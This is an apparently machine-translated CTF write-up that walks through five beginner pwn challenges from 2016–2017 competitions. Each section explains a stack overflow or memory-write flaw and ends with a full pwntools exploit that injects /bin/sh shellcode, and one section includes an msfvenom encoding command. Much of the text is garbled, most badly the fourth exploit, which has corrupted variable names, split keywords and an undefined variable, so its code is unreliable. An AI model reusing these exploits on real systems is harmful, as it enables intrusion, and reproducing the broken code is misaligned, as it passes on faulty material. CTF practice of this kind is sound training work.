Analysis of pwn entry series exercises (2)

 

Question 1-bitsctf 2017-command_line

 

Check the file format and the protection measures enabled. All protection is not enabled here (aslr is enabled by default), and it is a 64-bit elf.

 

 

I tried to run it and found that I printed an address (I don't need to consider aslr). I guess it is a stack address.

 

Put the IDA observation logic and find that an address on the stack is printed and can be used directly. Here, we can check the offset by the way, 0x10 + 8 = 0x18, and enter 0x18 characters to overwrite ret. Note that the shellcode is located at 0x20 (0x18 + 8 = 0x20) after the leaked stack address ). As for shellcode, you can find it from the Internet. You can try more than one. (I can't do the first one. I just need to change one ).

 

The complete exp is as follows:

 1 #!/usr/bin/python 2 #coding:utf-8 3  4 from pwn import * 5 io = process(‘./pwn1‘) 6  7 shellcode = ‘\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05‘ 8  9 shellcode_address_at_stack = int(io.recv()[:-1], 16)+0x2010 log.info("Leak stack address = %x", shellcode_address_at_stack)11 12 payload = "\x90"*2413 payload += p64(shellcode_address_at_stack)14 payload += shellcode15 io.sendline(payload)16 io.interactive()

 

 

 

Question 2-bsides San Francisco CTF 2017-b_64_ B _tuff

 

View the file format and protection. If a 32-bit ELF file is found, nx protection is enabled, that is, the data segment cannot be executed.

 

 

Run the command and find that the address at the top of the stack is printed. Next, we need to enter the address. We can see that it calculates the number of characters we enter, next, we will find a base64-like encryption (the end of the feature "= ). Stack Overflow occurs.

 

We put Ida into observation program logic. Focus on the last four statements. First, encrypt the input string with base64, then print out the encrypted base64 code, and then run it. Now the purpose is clear. We need to enter a string that meets base64 encryption and is executable shellcode.

 

Msfvenom is recommended here

 

First, we need an encoder. We only need a mix of codes that are case-insensitive. We can use msfvenom-l encoders to view the encoder.

 

There are still a lot of encoders, so we can choose x86/alpha_mixed.

Because msfvenom input can only be read from stdin, we use the pipe operator to input it to him through python.

Python-C 'import sys; sys. stdout. write ("\ x31 \ xf6 \ x48 \ xbb \ x2f \ x62 \ x69 \ x6e \ x2f \ x2f \ x73 \ x68 \ x56 \ x53 \ x54 \ x5f \ x6a \ x3b \ x58 \ x31 \ xd2 \ x0f \ x05 ") '| msfvenom-p-e x86/alpha_mixed-a Linux-F raw-A x86 -- platform Linux-O Payload

The complete exp is as follows:

 1 #!/usr/bin/python 2 #coding:utf-8 3  4 from pwn import * 5 from base64 import * 6  7 io = process(‘./b-64-b-tuff‘) 8  9 shellcode = b64decode("PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIp1kyigHaX06krqPh6ODoaccXU8ToE2bIbNLIXcHMOpAA")10 11 print io.recv()12 io.send(shellcode)    13 print io.recv()        14 io.interactive()

 

 

 

Question 3-csaw quals CTF 2017-Pilot

 

Check the file format and enable the protection. If the full protection is not enabled, run the 64-bit elf command to execute shellcode.

 

Observe the program execution. The useful information is a printed Address, which seems to be nonsense.

 

 

Let's put it into Ida and observe the logic.

 

So many STD library calls should be c ++ code. We ignore the extra information and pay attention to the READ function. We found that it entered 0x40 characters into the Buf array, while Buf is located in the rbp-0x20, there is obvious Stack Overflow here.

 

So our current idea is to overflow RET manufacturing stack overflow.

However, if I directly overwrite the returned value and execute the shellcode, an error will occur. I will break the breakpoint at the RET when the main function returns and follow up on debugging.

 

We found that after executing the push RBx operation, the return value of the function will be overwritten.

After pushing RDI is executed, the last line of the original shellcode is replaced. Because we cannot find a short shellcode, we need to perform truncation transformation on shellcode.

Through the previous debugging, we can find that, after executing the push RDI operation, it will destroy the stack space data of 24 bytes (3*8) before ret. Then, the controllable read input is 0x40, and the distance from Buf to RBP is 0x20. Therefore, the stack space after RET is 0x60-0x20-8-8 = 0x10, that is, 16 bytes of data can be controlled. By enabling the IDA bytecode display function, we can see that after pushing RDI, there are still 8 bytes of shellcode not executed, and the stack space after RET is enough for our control.

 

Using the preceding JMP jump command, we can see that its bytecode Is Eb 05 (note that the distance between JMP jump is calculated from the address of the next statement in this statement, therefore, 0x34-0x2f = 0x05 ). Note that the shellcode that we can input earlier is not covered by the first 24 bytes, And the JMP jump statement must be left with two bytes (EB 18)

We only need to first pass the 22-byte shellcode, then transfer the 2-byte EB 18 to jump, and then connect the remaining 8-byte shellcode to get the shell.

The complete exp is as follows:

 1 #!/usr/bin/python 2 #coding:utf-8 3  4 from pwn import * 5  6 io = process(‘./pilot‘) 7  8 shellcode1 = "\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50" 9 shellcode1 += "\xeb\x18"10 shellcode2 = "\x57\x48\x89\xe6\xb0\x3b\x0f\x05"11 print io.recvuntil("Location:")12 shellcode_address_at_stack = int(io.recv()[0:14], 16)13 log.info("Leak stack address = %x", shellcode_address_at_stack)14 15 payload = ""                        16 payload += shellcode117 payload += "\x90"*(0x28-len(shellcode1))18 payload += p64(shellcode_address_at_stack)19 payload += shellcode220 21 io.send(payload)22 io.interactive()

 

 

 

Question 4: openctf 2016-apprentice_www

 

Old Rules: Check the file format and protection enabled. You can see that NX protection is enabled, which is a 32-bit program.

 

 

Try to run the program and find that the program requires us to input. After the input, the system prompts Stack Overflow and treats our input as a command for execution (suspect ).

 

 

The main function is very simple. Refresh the buffer and alarm for simple anti-debugging. Focus on the Setup function and butterflyswag function.

 

 

We found that the mprotect function was called in setup to set the Memory Page attribute, which is equivalent to setting the. BSS,. Data, And. Text readable and writable executable. Next, go to the next function and observe that there are two inputs. The first input V1 is a single-byte variable, and the second input V2 is an address, it will write the V1 value to the address we entered and replace the lowest Bit Of the address. Because only one byte can be modified, we cannot get shell, we need to find a way to extend the controllable range by modifying one byte.

Our idea is to overwrite the jnz statement at 0x080485db so that it redirects back and continues to execute scanf twice.

 

Note that we can only modify the last byte. Therefore, the calculated result (0x9d-0xdb = 0xffc2) is used to calculate a negative value. Note that the first two scanf will be returned each time after modification. We can use this condition to complete all shellcode input (Multiple Input ). Here we can select a for loop with the shellcode length restriction. Remember that after the for loop is executed, we need to change the jump statement to the address of shellcode, and then filter out all the extra strings to enable shell.

 

The complete exp is as follows:

1 #! /Usr/bin/Python 2 # Coding: UTF-8 3 4 from pwn import * 5 6 IO = process ('. /apprentice_www ') 7 8 Gbit/s = 0x080485da # jnz Gbit/s address 9 shellcode_address = 0x080485db # address 10 11 shellcode = "\ x31 \ xc0 \ x50 \ x68 \ x2f \ x2f \ x73 \ x68 \ x68 \ x2f \ x62 \ x69 \ x6e \ x89 \ xe3 \ x50 \ x53 \ x89 \ xe1 \ xb0 \ x0b \ XCD \ X80 "12 13 Io. sendline (STR (patch_jne_address) 14 Io. sendline (STR (0xc2) # Change jnz loc_80485e9 to jnz loc_804859d, and run two call _ isoc99_scanf repeatedly to read shellcode15 16 for I in xrange (LEN (shellcode )): # Write shellcode to the 17 Io following the jnz loc_80485e9 command in bytes. sendline (STR (shellcode_address + I) 18 Io. sendline (STR (ord (shellcode [I]) 19 20 Io. sendline (STR (patch_jne_address) 21 Io. sendline (STR (0x00) # After writing the shellcode, change it to jnz loc_80485db and execute shellcode22 23 Io. recv () 24 Io. interactive ()

 

 

 

Question 5: openctf 2016-tyro_shellcode1

 

When the old method went through, it was found that the shellcode was not executed and Canary protection was enabled, and stack overflow was also limited.

 

 

Put it in IDA and look at it logically. MMAP is found to be a memory block, and the read input is also on this memory block. The following code runs our input directly. This is simple. You only need to input shellcode to get the shell.

 

Note that the input function called by read can directly use send instead of sendline during interaction, saving the space of the next byte, some strict requirements on stack space may have miraculous effects.

 

The complete exp is as follows:

 1 #!/usr/bin/python 2 #coding:utf-8 3  4 from pwn import * 5  6 io = process(‘./tyro_shellcode1‘) 7  8 shellcode = "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80" 9 10 io.sendline(shellcode)11 io.interactive()

 

Analysis of pwn entry series exercises (2)